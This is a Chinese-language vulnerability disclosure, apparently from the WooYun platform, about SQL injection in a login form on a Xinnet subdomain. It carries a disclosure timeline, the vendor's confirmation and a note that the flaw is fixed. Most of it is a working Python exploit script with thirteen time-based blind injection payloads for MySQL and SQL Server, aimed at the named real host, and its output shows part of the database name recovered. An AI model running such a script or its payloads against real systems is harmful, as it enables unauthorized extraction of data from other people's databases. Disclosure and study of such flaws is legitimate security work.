2015-01-12: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-22: 细节向核心白帽子及相关领域专家公开 2015-02-01: 细节向普通白帽子公开 2015-02-11: 细节向实习白帽子公开 2015-02-26: 细节向公众公开
新网分站存在SQL注入(附验证脚本)
current result is dctoken@
#!/usr/bin/python# coding=utf-8import httplib,time,string,sys,random,urllibdef getPayloadBody(body,i,payload,payload_type): ret = {} if payload_type == 1: s = str(random.random()) + "aa'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 2: s = str(random.random()) + "aa'XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR'bbb" % (i,ord(payload)) elif payload_type == 3: s = str(random.random()) + "aa';if(ascii(substring(user,%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload)) elif payload_type == 4: s = str(random.random()) + "aa';if(ascii(substring(db_name(),%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload)) elif payload_type == 5: s = "if(ascii(mid(user(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 6: s = "if(ascii(mid(database(),%s,1))=%s,sleep(6),0)" % (i,ord(payload)) elif payload_type == 7: s = "-1;if(ascii(substring(user,%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload)) elif payload_type == 8: s = "-1';if(ascii(substring(db_name(),%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload)) elif payload_type == 9: s = "aa'));if(ascii(substring(user,%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload)) elif payload_type == 10: s = "aa'));if(ascii(substring(db_name(),%s,1))=%s) WAITFOR DELAY '00:00:6'-- " % (i,ord(payload)) elif payload_type == 11: s = '"XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR"*/' % (i,ord(payload)) elif payload_type == 12: s = '"XOR(if(ascii(mid(database(),%s,1))=%s,sleep(6),0))OR"*/' % (i,ord(payload)) elif payload_type == 13: s = "if(now()=sysdate(),sleep(10),0)/*'XOR(if(ascii(mid(user(),%s,1))=%s,sleep(6),0))OR'bb" % (i,ord(payload)) for kv in body.split('&'): kv = kv.split('=') ret[kv[0]]=kv[1] if kv[1] != '*' else s return urllib.urlencode(ret)def exploit(host,url,body,payload_type,timeout=5): res = '' payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ] for i in range(1,30,1): for payload in payloads: try: conn = httplib.HTTPConnection(host, timeout=timeout) print payload, conn.request(method='POST',url=url,body=getPayloadBody(body,i,payload,payload_type),headers={'Content-Type': 'application/x-www-form-urlencoded'}) sys.stdout.flush() conn.getresponse().read() conn.close() except Exception,e: res += payload print "\ncurrent result is",res break print resif __name__=='__main__': host = 'hy.xinnet.com' url= '/j_acegi_security_check' body = 'submit=%e7%99%bb%e5%bd%95&j_code=94102&j_password=g00dPa%24%24w0rD&j_username=*' payload_type = 2 exploit(host,url,body,payload_type)
危害等级:中
漏洞Rank:10
确认时间:2015-01-12 10:28
非常感谢wcc526@乌云,小新正在玩命确认及修复中
2015-01-13:漏洞已修复,非常感谢wcc526@乌云